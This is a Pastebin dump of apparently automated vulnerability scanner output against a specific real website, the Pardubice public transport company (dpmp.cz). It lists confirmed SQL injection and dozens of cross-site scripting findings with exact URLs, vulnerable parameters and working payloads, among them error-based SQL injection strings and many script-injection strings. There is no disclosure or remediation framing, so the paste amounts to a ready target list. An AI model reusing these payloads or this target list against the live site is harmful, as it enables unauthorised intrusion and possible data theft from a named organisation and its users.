Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: NSFTW
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: NSFTW
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/prubeh-rekonstrukci-lodi-arnost-z-pardubic-detail/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyhledavani/?fast_search=1&search="+alert(9)+"
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: search
- Parameter Type: Querystring
- Attack Pattern: "+alert(9)+"
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/?rady='><body onload=alert(9)>&send=Vybrat
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rady
- Parameter Type: Querystring
- Attack Pattern: '><body onload=alert(9)>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/-236/?><ext/style=ext:expres/**/sion(alert(9))>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: ><ext/style=ext:expres/**/sion(alert(9))>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyhledavani/?search=></script><script>alert(9)</script>&send=hledat
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: search
- Parameter Type: Querystring
- Attack Pattern: ></script><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: captcha_code
- Parameter Type: Post
- Attack Pattern: "></script><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: card_number
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x002178)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: city
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x002179)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/tiskove-zpravy/1495-odstavec...ubicich-se-doprava-nezastavi/?"><ext/style=ext:expr/**/ession(alert(9))>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: "><ext/style=ext:expr/**/ession(alert(9))>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/novinky/dpmp.cz/doc/?"><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/novinky/vyletni-lod-arnost-z-pardubic/?'></script><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '></script><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/novinky/dpmp.cz/?'"--></style></script><script>alert(0x0022C1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0022C1)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/novinky/prepravni-a-tarifni-podminky/?'></script><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '></script><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/20120304/?'></style><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '></style><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/novinky/dpmp.cz/doc/dod/?"><object/onerror=alert(9)>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: "><object/onerror=alert(9)>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/jr/platnost_20100901/?'"--></style></script><script>alert(0x002801)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002801)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/20111211/?'></style><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '></style><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/content/iframe.php?'"--></style></script><script>alert(0x002F58)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002F58)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/ostatni/¨/?--><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: --><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/content/?'"--></style></script><script>alert(0x000515)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000515)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/imgs/?'"--></style></script><script>alert(0x000516)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000516)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/css/?'"--></style></script><script>alert(0x000512)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000512)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/rss/?'"--></style></script><script>alert(0x000514)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000514)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/js/?'"--></style></script><script>alert(0x00054B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00054B)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/js/jquery/?'"--></style></script><script>alert(0x000557)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000557)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/js/jqueryfancyzoom/?'"--></style></script><script>alert(0x00055B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00055B)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/?rady='"--></style></script><script>alert(0x00055F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rady
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00055F)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/cerpaci-stanice-1/?'"--></style></script><script>alert(0x000744)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000744)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/?'"--></style></script><script>alert(0x00073D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00073D)</script>
- Severity : Important
- Confirmation: Confirmed
- Detection Accuracy :
- Vulnerable URL: http://www.dpmp.cz/cs/plnici-stanice-cng-1/?'"--></style></script><script>alert(0x00075D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00075D)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/fotografie-z-dne-otevrenych-dveri/?'"--></style></script><script>alert(0x000771)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000771)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/dotaznik/?'"--></style></script><script>alert(0x000782)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000782)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/odprodej-vozidel/?'"--></style></script><script>alert(0x000789)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000789)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/vyletni-lod-arnost-z-pardubic/?'"--></style></script><script>alert(0x0007C4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0007C4)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/spoluprace-s-rop-sv/?'"--></style></script><script>alert(0x000799)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x000799)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/jr/platnost_20120304/?'"--></style></script><script>alert(0x0008EB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008EB)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/jr/?'"--></style></script><script>alert(0x0008FD)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0008FD)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/?'"--></style></script><script>alert(0x001DC0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x001DC0)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/dod/?'"--></style></script><script>alert(0x001DCB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x001DCB)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/tema/?'"--></style></script><script>alert(0x001D34)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x001D34)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dpmp.cz/?'"--></style></script><script>alert(0x001DD2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x001DD2)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/tiskove-zpravy/1566-odstavec...-s-mhd-do-prelouce-a-uhretic/?'"--></style></script><script>alert(0x002180)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002180)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/cs/prohlaseni-o-ochrane-osobnich-udaju/?'"--></style></script><script>alert(0x0022A2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0022A2)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: date
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00217F)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/20111211-1/?'"--></style></script><script>alert(0x002618)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002618)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/jr/platnost_20100901/nocniprovoz/?'"--></style></script><script>alert(0x00288D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00288D)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/novinky/vyrocni-zpravy/?'"--></style></script><script>alert(0x002C81)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002C81)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/zastavkove-jizdni-rady/?rady='"--></style></script><script>alert(0x002E3A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rady
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x002E3A)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/firmy/¨/cs/?'"--></style></script><script>alert(0x002F31)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002F31)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyhledavani/?search='"--></style></script><script>alert(0x002E4C)</script>&submit=<SPAN>Hledat</SPAN>&fast_search=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: search
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x002E4C)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/firmy/¨/cs/doprava-v-pardubicich/?'"--></style></script><script>alert(0x002F43)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002F43)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/firmy/¨/?'"--></style></script><script>alert(0x002F33)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002F33)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/zastavkove-jizdni-rady/?rady='"--></style></script><script>alert(0x002E49)</script>&send=Vybrat
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rady
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x002E49)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/kultura/¨/?'"--></style></script><script>alert(0x002F69)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002F69)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/kultura/¨/cs/?'"--></style></script><script>alert(0x002F7C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002F7C)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/ostatni/¨/cs/?'"--></style></script><script>alert(0x002FA9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FA9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/ostatni/¨/cs/doprava-v-pardubicich/?'"--></style></script><script>alert(0x002FC9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FC9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/kultura/¨/cs/doprava-v-pardubicich/?'"--></style></script><script>alert(0x002FA4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x002FA4)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/?'"--></style></script><script>alert(0x003146)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003146)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: e-mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x003125)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x003144)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00315B)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00315B)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0031D2)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/prubeh-rekonstrukci-lodi-arnost-z-pardubic-detail/odeslani-formulare/?'"--></style></script><script>alert(0x00319C)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x00319C)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotaznik/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: captcha_code
- Parameter Type: Post
- Attack Pattern: "></style><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: firstname
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00315C)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0031E0)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: lastname
- Parameter Type: Post
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: phone
- Parameter Type: Post
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/prubeh-rekonstrukci-lodi-arnost-z-pardubic-detail/odeslani-formulare/
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: formId
- Parameter Type: Post
- Attack Pattern: 23'"--></style></script><script>alert(0x003321)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/objizdna-trasa-mhd/?'"--></style></script><script>alert(0x003292)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003292)</script>
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/seznam-zastavek/?'"--></style></script><script>alert(0x003301)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x003301)</script>
- ||| Permanent XSS (Cross-site Scripting)
- Severity : Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.dpmp.cz/vyhledavani/?search=hledanĂ˝ text&send='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
